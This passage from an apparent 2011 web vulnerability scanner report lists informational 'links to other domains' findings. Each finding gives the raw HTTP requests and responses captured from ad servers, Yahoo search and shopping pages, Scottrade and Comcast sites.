<span class="ditto-img"><img src = http://cr0.worthathousandwords.com/2/7D/C3/8CB52A13AAF0A7B8C08B35C04F4.jpg?pid=9184&qs=yvFPhoi%26ixv%27Tfrh%29Ywtygwn%24UZ%2Bgg%7FA%7Ex%7C4yjrkf%7Cgwnvsbsj1lst%27yzoFPhoi%26ixv%27Tfrh%29Ywtygwn%24UZ%2Bjh%7CA%3D%21Fiunw%27ut%264%3B4%27Bhxh%7C%24Ovsz%2F%29Jptm2%23Qmrf1%26Fjqw-%25Xhue%7F height = "50px" </img></span>
...[SNIP]...
<span class="ditto-img"><img src = http://cr0.worthathousandwords.com/5/7C/6E/CACD1F50052E0EC1D084CCFBC3A.jpg?pid=9184&qs=yvFR%60%21Fxhj%24Yffr%23Nw%7Bbyk%29jh%7D%3E%5Ckllllsy4fxq6O%5E%2Cw%7DpDO%5E%26D%7Bih%21Wkdu%24Ltygwn%2AkfxCQn%7B%27Ztxn%29Eyff%26Kxqlt%25Lr%7B%24Zbqk%23%60m%7Bi%25Sxuxpqqk%23Ylvuty%23jrk%21Ikwjmsfi%26Lwjv%2F height = "50px" </img></span>
...[SNIP]...
<div id='z-beacon'><img width='1' height='1' src='http://beacon.partners-z.com/yre/20100908/b?uuid=3c7f76504307f88c4e126d344670b7cc&prid=cdd32416ccf6d25d56b9eb799da3215e&price=&lid=2124552455,2125516156,89336147,31505014,72516437,72538384,2125075536,79497737,2125160035,2124842339&p=10010&page=search&'/></div>
...[SNIP]...
<input type="radio" name="recipientId" value="5747190" class="lb-agent-input" checked />
<img src='http://e.yimg.com/pf/api/res/1.2/3PxI.pdX4SbSjk3uXgcfXA--/YXBwaWQ9eXJlYWxlc3RhdGU7Zmk9Zml0O3c9MzY7aD0zNjtxPTcw/http://photos2.zillow.com/is/image/i0/i8/i1503/IS1pms7ljoynmar.jpg?op_sharpen=1&qlt=90&hei=36&wid=36&size=48,48&scl=1'/>
<a href="/agent-profile;_ylt=AuIzBi3Ca8nhS3.ManlO1Rxn47Qs?agentid=5747190&reqid=h002-1261-4543-1-928036&page=search&cza=10010" target="_blank" class="agent-name">
...[SNIP]...
<input type="radio" name="recipientId" value="3000973" class="lb-agent-input" />
<img src='http://e.yimg.com/pf/api/res/1.2/XaOb6_Cz0VUkJBsMf1rldA--/YXBwaWQ9eXJlYWxlc3RhdGU7Zmk9Zml0O3c9MzY7aD0zNjtxPTcw/http://photos1.zillow.com/is/image/i0/i6/i8508/IScok46260n8gz.jpg?op_sharpen=1&qlt=90&hei=36&wid=36&size=48,48&scl=1'/>
<a href="/agent-profile;_ylt=Avv4oYD6RX26_LtYAaI8lwdn47Qs?agentid=3000973&reqid=h002-1261-4543-1-928036&page=search&cza=10010" target="_blank" class="agent-name">
...[SNIP]...
<input type="radio" name="recipientId" value="3784882" class="lb-agent-input" />
<img src='http://e.yimg.com/pf/api/res/1.2/NDjwp2hEd1EgdGw_NhOIVQ--/YXBwaWQ9eXJlYWxlc3RhdGU7Zmk9Zml0O3c9MzY7aD0zNjtxPTcw/http://photos3.zillow.com/is/image/i0/i0/i9931/IS12a0bzrkvsgpv.jpg?op_sharpen=1&qlt=90&hei=36&wid=36&size=48,48&scl=1'/>
<a href="/agent-profile;_ylt=Athag3x5VX9jft9zbTYjYHtn47Qs?agentid=3784882&reqid=h002-1261-4543-1-928036&page=search&cza=10010" target="_blank" class="agent-name">
...[SNIP]...
<div class="body">
<iframe src="http://show.partners-z.com/s/show?chan=YAHOO&prid=cdd32416ccf6d25d56b9eb799da3215e&uuid=3c7f76504307f88c4e126d344670b7cc&zip=10010"></iframe>
...[SNIP]...
</div>

<script type="text/javascript" src="http://l.yimg.com/zz/combo?d/lib/yui/2.8.1/build/yahoo-dom-event/yahoo-dom-event.js&d/lib/yui/2.5.2/build/container/container-min.js&qf/static/js/4.3.21/overlay-201105050424.js&qf/static/js/4.3.21/ult-strip-201105050424.js&d/lib/yui/2.5.2/build/connection/connection-min.js&d/lib/yui/2.5.2/build/cookie/cookie-beta-min.js&d/lib/yui/2.5.2/build/json/json-min.js&qf/static/js/4.3.21/util-201105050424.js&d/lib/yui/2.5.2/build/get/get-min.js&d/lib/yui/2.5.2/build/history/history-min.js&qf/static/js/4.3.21/mvc-201105050424.js&qf/static/js/4.3.21/srp-mvc-201105050424.js&qf/static/js/4.3.21/class-cycler-201105050424.js&d/lib/yui/2.5.2/build/dragdrop/dragdrop-min.js&d/lib/yui/2.5.2/build/animation/animation-min.js&d/lib/yui/2.5.2/build/slider/slider-min.js&qf/static/js/4.3.21/slider-201105050424.js&qf/static/js/4.3.21/rb-en-201105050424.js&d/lib/ult/ylc_1.9.js&qf/static/js/4.3.21/popup-201105050424.js&qf/static/js/4.3.21/header-201105050424.js&qf/static/js/4.3.21/location-srp-focus-201105050424.js&d/lib/uh/15/js/uh_rsa-1.0.9.js&d/lib/yui/2.5.2/build/autocomplete/autocomplete-min.js&qf/static/js/4.3.21/autocomplete-201105050424.js&qf/static/js/4.3.21/srp-saved-search-list-201105050424.js&qf/static/js/4.3.21/srp-save-search-201105050424.js&qf/static/js/4.3.21/srp-pagination-201105050424.js&qf/static/js/4.3.21/srp-refine-form-201105050424.js&qf/static/js/4.3.21/srp-map-toggler-201105050424.js&qf/static/js/4.3.21/srp-view-toggler-201105050424.js&qf/static/js/4.3.21/imageloader-201105050424.js&qf/static/js/4.3.21/srp-imageloader-201105050424.js&qf/static/js/4.3.21/srp-listing-201105050424.js&qf/static/js/4.3.21/srp-sort-control-201105050424.js&qf/static/js/4.3.21/ult-ylc-201105050424.js&qf/static/js/4.3.29/listing-ad-201105300129.js"></script>
...[SNIP]...
<noscript><img width=1 height=1 alt="" src="http://csc.beap.ad.yieldmanager.net/i?bv=1.0.0&bs=(128nfkanm(gid$m_XwnmKJhxXpARpjTl.wjQ9iMhd7ak5mFuwABTk1,st$1315313388360586,v$1.0))&t=J_3-D_3"></noscript>
...[SNIP]...

15.87. http://redirect.rtrk.com/redirect

Summary

Severity:   Information
Confidence:   Certain
Host:   http://redirect.rtrk.com
Path:   /redirect

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /redirect?RL_rurl=http://utdi.reachlocal.com/coupon/&RL_qstr=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26rl_key%3De2e30c5686d91c3f4971163361e1b86a%26kw%3D233292%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice%26pub_cr_id%3D8668759748&RL_ckstr=RlocalUID%3Dscid%253D2323693%2526cid%253D837045%2526tc%253D11090604520111271%2526kw%253D233292%3BRlocalHilite%3Dkw_hilite_off%253D0%2526se_refer%253Dhttp%25253A%25252F%25252Fwww.google.com%25252Fsearch%25253Fsourceid%25253Dchrome%252526ie%25253DUTF-8%252526q%25253Dtelephone%25252Bservice%3BRlocalTiming%3Dlanding_loadtime_off%253D0%2526retarget_off%253D0 HTTP/1.1
Host: redirect.rtrk.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:52:03 GMT
Server: Apache
Set-Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; domain=.rtrk.com; path=/
Set-Cookie: RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; domain=.rtrk.com; path=/
Set-Cookie: RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; domain=.rtrk.com; path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Location: http://utdi.reachlocal.com/coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748
Vary: Accept-Encoding
Content-Length: 587
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7f45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:16:56 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.reachlocal.com/coupon/?scid=2323693&amp;cid=837045&amp;tc=11090604520111271&amp;rl_key=e2e30c5686d91c3f4971163361e1b86a&amp;kw=233292&amp;dynamic_proxy=1&amp;primary_serv=utdi.reachlocal.net&amp;se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&amp;pub_cr_id=8668759748">here</a>
...[SNIP]...

15.88. http://scottrade.wsod.com/embed/5f7eefdbd0f4af885fc291827f23e4b0/37.0.js.302x255/1315313323**

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scottrade.wsod.com
Path:   /embed/5f7eefdbd0f4af885fc291827f23e4b0/37.0.js.302x255/1315313323**

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /embed/5f7eefdbd0f4af885fc291827f23e4b0/37.0.js.302x255/1315313323**;10,3,183;1920;1200;http%3A_@2F_@2Fwww.scottrade.com_@2Fonline-trading.html_@3Fcid%3DAM%7C46%7C1542%7C1206%7C131_@26rid%3DL%7C1736690_@26amvid%3DOPT_OUT_@26symbol%3DSPY HTTP/1.1
Host: scottrade.wsod.com
Proxy-Connection: keep-alive
Referer: http://www.scottrade.com/online-trading.html?cid=AM|46|1542|1206|131&rid=L|1736690&amvid=OPT_OUT&symbol=SPY
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ub=OPT_OUT

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 12:48:45 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_8=10:37:190:18:0:50961:1315313325:B2|10:37:191:18:0:50961:1315313324:B2; expires=Fri, 07-Oct-2011 12:48:45 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 841

   function cmsOOB37190() {
       var ioob = new Image();
       ioob.onload = function() {}
       var rand = Math.random() + "";
           rand = rand * 10000;
       ioob.src = '//scottrade.wsod.com/click/5f7eefdbd0f4af885fc2
...[SNIP]...
3183;1920;1200;http:_@2F_@2Fwww.scottrade.com_@2Fonline-trading.html_@3Fcid=AM|46|1542|1206|131_@26rid=L|1736690_@26amvid=OPT_OUT_@26symbol=SPY;'+rand;
   }
       function wsod_image37() {
       document.write('<a href="http://www.scottrade.com/investment-products/ira.html" target="_parent" onmousedown="cmsOOB37190()" title="Get Ready For Retirement. Choose the IRA that Fits your plans."><img style="border:none;" src="http://media.wsodcdn.com/5f7eefdbd0f4af885fc291827f23e4b0/iras.jpg" alt="Get Ready For Retirement. Choose the IRA that Fits your plans." /></a>
...[SNIP]...

15.89. http://scottrade.wsod.com/embed/5f7eefdbd0f4af885fc291827f23e4b0/37.0.js.302x255/1315313352**

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scottrade.wsod.com
Path:   /embed/5f7eefdbd0f4af885fc291827f23e4b0/37.0.js.302x255/1315313352**

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /embed/5f7eefdbd0f4af885fc291827f23e4b0/37.0.js.302x255/1315313352**;10,3,183;1920;1200;http%3A_@2F_@2Fwww.scottrade.com_@2Fonline-trading_@2Ffund-your-account.html HTTP/1.1
Host: scottrade.wsod.com
Proxy-Connection: keep-alive
Referer: http://www.scottrade.com/online-trading/fund-your-account.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ub=OPT_OUT; u=4e6616acaf0c5; f8=258981:et:8:ETF:07:4:; i_8=10:37:191:18:0:50961:1315313324:B2

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 12:49:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_8=10:37:190:18:0:50961:1315313355:B2|10:37:190:18:0:50961:1315313354:B2|10:37:191:18:0:50961:1315313324:B2; expires=Fri, 07-Oct-2011 12:49:15 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 787

   function cmsOOB37190() {
       var ioob = new Image();
       ioob.onload = function() {}
       var rand = Math.random() + "";
           rand = rand * 10000;
       ioob.src = '//scottrade.wsod.com/click/5f7eefdbd0f4af885fc291827f23e4b0/37.190.oob.302x255/**;10.3183;1920;1200;http:_@2F_@2Fwww.scottrade.com_@2Fonline-trading_@2Ffund-your-account.html;'+rand;
   }
       function wsod_image37() {
       document.write('<a href="http://www.scottrade.com/investment-products/ira.html" target="_parent" onmousedown="cmsOOB37190()" title="Get Ready For Retirement. Choose the IRA that Fits your plans."><img style="border:none;" src="http://media.wsodcdn.com/5f7eefdbd0f4af885fc291827f23e4b0/iras.jpg" alt="Get Ready For Retirement. Choose the IRA that Fits your plans." /></a>
...[SNIP]...

15.90. http://search.keywordblocks.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.keywordblocks.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /?dn=shopping.yahoo.com&crid=712228940&pid=7POF8V98Z&cpnet=rSJi3Vaa2nKBgvwrl34N8d7pTjDgp%2BiyZmghG15DhMe%2F70RimpLU0doYbwbgr4tv&size=300x250&requrl=http%3A%2F%2Fshopping.yahoo.com&cid=7CU2PK0I5 HTTP/1.1
Host: search.keywordblocks.com
Proxy-Connection: keep-alive
Referer: http://ads.media.net/medianet.php?cid=7CU2PK0I5&size=300x250&crid=712228940&ran=0.19952531741000712
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:22 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: 59vt6285872293003050=CLNoYiXCEmm2%2FJtx3s0qnnD%2FYKxOT0hIOqnvdXCDd2hpFyQZQrnLrgVbu9Qp7Kq2; path=/; domain=search.keywordblocks.com; httponly
Content-Type: text/html; charset=UTF-8
Content-Length: 8515

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head><meta name="tids" content="a='955' b='3776' c='shopping.yahoo.com' d='site_default_template_id
...[SNIP]...
<div id="media-ad-footer"><a target="_blank" href="http://media.net/">ads by media.net</a>
...[SNIP]...

15.91. http://search.keywordblocks.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.keywordblocks.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /?dn=autos.yahoo.com&crid=717009282&pid=7POI9N8KL&cpnet=zBEazVOF9oRZUx591TuhSWtqIwgpof8uoKiwzIxYxbbZLdGHgYfUW1G4u8WvGw1d&size=728x90&requrl=http%3A%2F%2Fautos.yahoo.com%2Fdarla%2Fmd.php%3Fen%3Dutf-8&cid=7CU9K3MPS HTTP/1.1
Host: search.keywordblocks.com
Proxy-Connection: keep-alive
Referer: http://ads.media.net/medianet.php?cid=7CU9K3MPS&size=728x90&crid=717009282&ran=0.3385789911262691
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vsid=58vr6285871398408930; 58vt6285871398408930=OMBtes1fbQK%2FGm21C%2FZ7mj9I%2BExeQZOKygrQwRbb4tVrbNUsVE4zuzjFtekuNDUv

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:48:05 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: 58vt6285888506906915=ZtOSXDpm27Ys%2B%2BhNkbPD91VHMpps028ELTwum9c5CpVNPEYXsEX3YLkTcx0CkLvmamVCtKpGhtMicC5oYvyrxg%3D%3D; path=/; domain=search.keywordblocks.com; httponly
Content-Type: text/html; charset=UTF-8
Content-Length: 9923

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta name="tids" content="a='1214' b='4134'
...[SNIP]...
<div id="media-ad-footer">
<a href="http://www.media.net" target="_blank">ads by media.net</a>
...[SNIP]...

15.92. http://search.yahoo.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.yahoo.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /search;_ylt=Ajuek99xQM0_yZ.DABRjfVXSrYZ4?p=xss&fr=ush-sports HTTP/1.1
Host: search.yahoo.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad?urn=nfl-wp6443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxid=016e3b4e6615bdb5; adxf=3078081@1@223.1071929@2@223; BA=ba=4&ip=50.23.123.106&t=1315331160

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:46:48 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 35648

<!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><script>var pL=0, pUrl='http://ybinst2.ec.yimg.com/ec/fd/ls/l?IG=4a06753073d74d7bba4e661638f5b66
...[SNIP]...
</title><link rel="stylesheet" type="text/css" href="http://a.l.yimg.com/a/lib/s10/srp-core-css_201108281318.css"><style type="text/css">
...[SNIP]...
<li><a href="http://ebm.cheetahmail.com/r/regf2?a=0&aid=497540725&n=11&PROMOCODE=US2117&o=US2117&_vsrefdom=yahooseemsghere">Advertising Programs</a>
...[SNIP]...

15.93. http://shop.comcast.com/XFINITY/voice/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.comcast.com
Path:   /XFINITY/voice/

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /XFINITY/voice/?CMP=KNC-IQ_ID_34270410-VQ2-g-VQ3--VQ6-14654906136&iq_id=34270410 HTTP/1.1
Host: shop.comcast.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 13974
Content-Type: text/html
Content-Location: http://shop.comcast.com/XFINITY/voice/version_1.html
Last-Modified: Mon, 11 Jul 2011 20:38:23 GMT
Accept-Ranges: bytes
ETag: "c6f3807aa40cc1:14d2"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 11:50:09 GMT

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv=
...[SNIP]...
<h3 id="logo-xfinity">
<a href="http://www.xfinity.com" target="_blank">XFINITY&reg;</a>
...[SNIP]...

15.94. http://shopping.yahoo.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shopping.yahoo.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /search;_ylt=ApMQLGDYOT7QlJIA.L4LcHMEgFoB?p=xss+phone&did=0 HTTP/1.1
Host: shopping.yahoo.com
Proxy-Connection: keep-alive
Referer: http://shopping.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxid=016e3b4e6615bdb5; adxf=3078081@1@223.1071929@2@223; BA=ba=4&ip=50.23.123.106&t=1315331160

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:49:58 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8
Cache-Control: private
Content-Length: 86025


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<link rel="stylesheet" href="http://l.yimg.com/a/combo?yui/2.7.0/build/reset-fonts-grids/reset-fonts-grids.css&shop/s2/sh_global_201107271737.css&shop/s2/sh_listing_201105261033.css&uh/15/css/uh_rsa-1.0.5.css" type="text/css"/>

<script type="text/javascript">
...[SNIP]...
</script>
<script src="http://l.yimg.com/us.js.yimg.com/lib/yui/3.2.0/build/yui/yui-min.js"></script>
...[SNIP]...
<div class="pad">
<link type='text/css' rel='stylesheet' href='http://l.yimg.com/zz/combo?kx/ucs/uh/css/215/yunivhead-min.css&kx/ucs/uh/css/221/logo-min.css&kx/ucs/search/css/180/search_all-min.css&kx/ucs/search/css/170/search_buttons-min.css' /><style>
...[SNIP]...
</script><script charset='utf-8' type='text/javascript' src='http://l.yimg.com/zz/combo?kx/ucs/common/js/1/setup-min.js&kx/ucs/sts/js/83/skip-min.js&kx/ucs/menu_utils/js/134/menu_utils-min.js&kx/ucs/username/js/33/user_menu-min.js&kx/ucs/help/js/35/help_menu-min.js&kx/ucs/utility_link/js/15/utility_menu-min.js&kx/ucs/common/js/127/logo_debug-min.js&kx/ucs/homepage/js/124/homepage-min.js&kx/ucs/search/js/179/search-min.js'></script>
...[SNIP]...
<div style="margin:0 20px; zoom:1;"><IFRAME FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO WIDTH=160 HEIGHT=600 SRC="http://ad.yieldmanager.com/st?_PVID=Tclt9GKJlBXQ8U1PTmYW9Q4wMhd7ak5mFvYAAdMa&ad_type=iframe&ad_size=160x600&site=140497&section_code=14485914&cb=1315313398192648&promote_sizes=1&yud=zip%3D%26ycg%3D%26yyob%3D&pub_redirect_unencoded=1&pub_redirect=http://global.ard.yahoo.com/SIG=15lehavft/M=787833.14485914.14323757.1471092/D=shp/S=14489115:SKY/Y=YAHOO/EXP=1315320598/L=Tclt9GKJlBXQ8U1PTmYW9Q4wMhd7ak5mFvYAAdMa/B=DH96D9BDRrE-/J=1315313398192648/K=Jng.21wc125Z8MOUtgsiJw/A=6284739/R=0/*"></IFRAME><!-- Yahoo! Web Analytics - All rights reserved --> <script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...
316%26z=94089%26m=890452929%26mt=~~~~~~~~n~~~~~%26q=n%26search=xss%2Bphone%26skd=0%26dl=1%26source=xmlapi%26k=d49cb951f729775f2aa165936bf50c53" rel="nofollow" target="_blank" upstrackindex="890452929"><img src="http://i.pgcdn.com/pi/89/04/52/890452929_125.jpg" style="" alt="WARNING BEWARE OF THE SOUSAPHONE PLAYER Coffee Mug Metallic Gold 11 oz" title="WARNING BEWARE OF THE SOUSAPHONE PLAYER Coffee Mug Metallic Gold 11 oz "></a>
...[SNIP]...
=~~9%26r=5316%26m=890431304%26mt=~~~~~~~~n~~~~~%26q=n%26search=xss%2Bphone%26skd=0%26dl=1%26source=xmlapi%26k=fd47ef25098b039c53f19b56cb128c9d" rel="nofollow" target="_blank" upstrackindex="890431304"><img src="http://i.pgcdn.com/pi/89/04/31/890431304_125.jpg" style="" alt="WARNING BEWARE OF THE SOUSAPHONE PLAYER Mug for Coffee / Hot Beverage 11 oz. LIGHT BLUE" title="WARNING BEWARE OF THE SOUSAPHONE PLAYER Mug for Coffee / Hot Beverage 11 oz. LIGHT BLUE "></a>
...[SNIP]...
=~~9%26r=5316%26m=872522412%26mt=~~~~~~~~n~~~~~%26q=n%26search=xss%2Bphone%26skd=0%26dl=1%26source=xmlapi%26k=febebd41db8b2d9697b6484939b0e4c1" rel="nofollow" target="_blank" upstrackindex="872522412"><img src="http://i.pgcdn.com/pi/87/25/22/872522412_125.jpg" style="" alt="WARNING BEWARE OF THE SOUSAPHONE PLAYER Mug for Coffee / Hot Beverage (choice of sizes and colors)" title="WARNING BEWARE OF THE SOUSAPHONE PLAYER Mug for Coffee / Hot Beverage (choice of sizes and colors) "></a>
...[SNIP]...
=~~9%26r=5316%26m=872575605%26mt=~~~~~~~~n~~~~~%26q=n%26search=xss%2Bphone%26skd=0%26dl=1%26source=xmlapi%26k=12c7311221c52cd4a1096e996a3b5691" rel="nofollow" target="_blank" upstrackindex="872575605"><img src="http://i.pgcdn.com/pi/87/25/75/872575605_125.jpg" style="" alt="WARNING BEWARE OF THE SOUSAPHONE PLAYER Mug for Coffee / Hot Beverage 11 oz. MAROON" title="WARNING BEWARE OF THE SOUSAPHONE PLAYER Mug for Coffee / Hot Beverage 11 oz. MAROON "></a>
...[SNIP]...
=~~9%26r=5316%26m=872809391%26mt=~~~~~~~~n~~~~~%26q=n%26search=xss%2Bphone%26skd=0%26dl=1%26source=xmlapi%26k=979172f3e7c3ee91a8f9bcdcb76aa01d" rel="nofollow" target="_blank" upstrackindex="872809391"><img src="http://i.pgcdn.com/pi/87/28/09/872809391_125.jpg" style="" alt="WARNING BEWARE OF THE SOUSAPHONE PLAYER Mug for Coffee / Hot Beverage 15 oz. MAROON" title="WARNING BEWARE OF THE SOUSAPHONE PLAYER Mug for Coffee / Hot Beverage 15 oz. MAROON "></a>
...[SNIP]...
=~~9%26r=5316%26m=872761404%26mt=~~~~~~~~n~~~~~%26q=n%26search=xss%2Bphone%26skd=0%26dl=1%26source=xmlapi%26k=922592b0796d5c88e43395add5b727b3" rel="nofollow" target="_blank" upstrackindex="872761404"><img src="http://i.pgcdn.com/pi/87/27/61/872761404_125.jpg" style="" alt="WARNING BEWARE OF THE SOUSAPHONE PLAYER Mug for Coffee / Hot Beverage 15 oz. BLUE" title="WARNING BEWARE OF THE SOUSAPHONE PLAYER Mug for Coffee / Hot Beverage 15 oz. BLUE "></a>
...[SNIP]...
